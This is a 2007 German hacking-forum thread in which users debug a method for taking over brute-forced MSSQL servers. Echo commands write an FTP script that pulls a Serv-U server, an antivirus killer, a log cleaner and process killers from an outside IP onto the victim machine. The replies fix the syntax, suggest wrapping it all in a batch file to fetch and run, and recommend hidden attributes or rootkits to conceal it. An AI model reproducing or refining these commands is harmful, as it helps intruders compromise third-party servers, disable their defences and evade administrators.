Mssql Hacking per echo

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von zwe-etschge, 22. Januar 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 22. Januar 2007
    Hey Leute ich hacke seid 2 Wochen meine eigenen gescannten und gebruteten mssql Scans. Bisher kam ich auch immer mit der Terminal Methode sehr weit und konnte schon einige stros einrichten die auch noch laufen Aber nun kommen wir zum Problem ich habe heute und gestern mal einige Tutorials gelesen und bin auf die Echo Methode gestossen. Habe dann ein Script gefunden und es mal meinen Bedürfnissen angepasst. Sieht nun so aus.

    Code:
    echo open 208.3.91.83>>c:\ftpscr1.txt
    echo user anonymous>>c:\ftpscr1.txt
    echo [email]anonymous@lol.com>>c:\ftpscr1.txt[/email]
    echo BINARY>>c:\ftpscr1.txt
    echo ServUAdmin.exe>>c:\ftpscr1.txt
    echo ServUDaemon.exe>>c:\ftpscr1.txt
    echo ServUTray.exe>>c:\ftpscr1.txt
    echo servu.ini>>c:\ftpscr1.txt
    echo AV-Killer>>c:\ftpscr1.txt
    echo clearlogs.exe>>c:\ftpscr1.txt
    echo kill.exe>>c:\ftpscr1.txt
    echo Fport.exe>>c:\ftpscr1.txt
    echo quit>>c:\ftpscr1.txt
    
    ftp -n -v -s:c:\ftpscr.txt
    Also das Script sagt ja was er sich dann alles holen soll. Aber irgendwie funktiniert es nicht. Ich bekomme in der SQL Konsole IMMER einen Fehler not connected. Ich weiss echt nicht mehr woran es liegt wie gesagt habe gestern 6 geschlagene Stunden dran gesessen und probiert nix. Tutorials habe ich auch alle durch auch keine Hilfe gefunden. Also hoffe ich mal auf euch. Wenn hier jemand weiss wo mein Fehler liegt dann helft mir mal bitte, ich bekomme es alleine nicht hin Wenn hier also jemand weiss wo mein Fehler is bitte korrigieren oder vielleicht hat hier ja sogar jemand eins das Funktiniert. Für jede hilfe gibt es von mir und einem Kollegen eine dicke Bewertung Ich danke euch schonmal und hoffe jeder hat verstanden wo mein Problem liegt. Auf Kommentare wie du bist nur zu faul zum suchen oder so kann ich liebend verzichten
     
  2. 22. Januar 2007
    AW: Mssql Hacking per echo

    Also das Script was dü erwähnst legt eine .txt datei an mit ftp befehlen. Es sagt das sich der server per ftp vom anonymus Pub bestimme files holen soll. Check erstmal ob dei Pub online ist und alle files drauf sind. *gg*

    Der code muss so, als beispiel an einer exe:

    Code:
    echo open 208.3.91.83>>c:\ftpscr1.txt
    echo user anonymous>>c:\ftpscr1.txt
    echo [email]anonymous@lol.com>>c:\ftpscr1.txt[/email]
    echo BINARY>>c:\ftpscr1.txt
    echo [B]get [/B]ServUDaemon.exe>>c:\ftpscr1.txt
    echo quit>>c:\ftpscr1.txt
    Danach die ftp exe mit der txt ausführen lassen. Ach und noch ein Tipp lass es lieber. Wenn ich mir so gerade anschaue was du da für files rüberladen willst *gg*. Mach dir erstmal ne vernünftige servu.exe und servu.ini. Denkst du dem Admin fällt das nicht auf was du da machst?? ^^ Würdest du dich nicht wundern wenn du plötzlich im taskmanger einen unbekanten ftp server siehst?? ^^

    \\

    achja dein "avkiller" hat keine dateiendung (.exe,.bat) ^^

    mfg Romka
     
  3. 22. Januar 2007
    AW: Mssql Hacking per echo

    wenn du
    Code:
    echo user ...>>...
    benutzt, musst du
    Code:
    echo user anonymous a@ftp.com>>...
    schreiben, sonst gehts nicht (also user/pw auf einer zeile). binary kannst getrost weglassen.

    sonst versuchs mal mit
    Code:
    ...
    echo anonymous>>...
    echo a@ftp.com>>...
    und mit
    Code:
    ftp -v -a -s:<script>
    //edit: und naja, dateien via ftp übertragen is ned die einzige möglichkeit, da gibts noch massenweise anderes, teilweise auch besseres ^^
     
  4. 22. Januar 2007
    AW: Mssql Hacking per echo

    Man kanns in einer zeile nutzen, so wie ich es gezeigt habe funzt es aber genau so.

    mfg Romka
     
  5. 22. Januar 2007
    AW: Mssql Hacking per echo

    Okay also soweit habe ich es dann mal verstanden werde es dann gleich mal testen. Aber ich bin ein bisschen faul. Kann ich dann nicht einfac die Befehle in eine .bat Datei packen diese .bat Datei auf den Pub legen mit den Datein und sie mir dann holen + ausführen ? Müsste doch auch gehen oder ? Und danke auch an romka ich werde mich mal umgucken wie man das denn richtig versteckt BW bekommt ihr gleich beide ,

    Falls hier auch noch jemand weiss wie man das versteckt gleich mal melden =) Bin echt für jede Hilfe dankbar

    EDIT://

    Hilfe doch noch ein Fehler:

    Number: -2147217871
    Description: Timeout abgelaufen
     
  6. 22. Januar 2007
    AW: Mssql Hacking per echo

    nimm mal nen andern pub, der vllt. im gleichen land steht. wenns dann nicht geht, musst dir wohl oder übel ne andere methode suchen

    zu deiner frage wegen batch: klar geht das, die batch muss halt die befehle enthalten, um das ftp-script zu schreiben und zusätzlich noch auszuführen!

    zum verstecken: einerseits file-attribute auf hidden/system/read-only setzen (schwacher schutz), andererseits rootkits benutzen, was allerdings fortgeschrittene kenntnisse erfordert, will man's denn richtig machen
    => rootkit
     
  7. 4. Februar 2007
    AW: Mssql Hacking per echo

    also ich hätte mal gesagt, dass nach der open IP noch der Port kommt

    echo open 208.3.91.83 21>>c:\ftpscr1.txt

    dann sollte es gehen !
     
  8. 4. Februar 2007
    AW: Mssql Hacking per echo

    port ist nur nötig, wenn dieser vom standart ftp-port abweicht, ergo etwas anderes als 21 ist.
     
  9. 4. Februar 2007
    AW: Mssql Hacking per echo

    Du kannst auch den Teil:
    echo user anonymous>>c:\ftpscr1.txt
    echo anonymous@lol.com>>c:\ftpscr1.txt

    weglassen und dafür aber den Befehl:
    ftp -A -s:<script>
    benutzen; "-A" veranlasst das sich der Server automatisch mit "anonymous" anmeldet.
    greetz
     
  10. 4. Februar 2007
    AW: Mssql Hacking per echo

    ich glaub das thema ist schon lang erledigt....



    *closed
     
  11. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.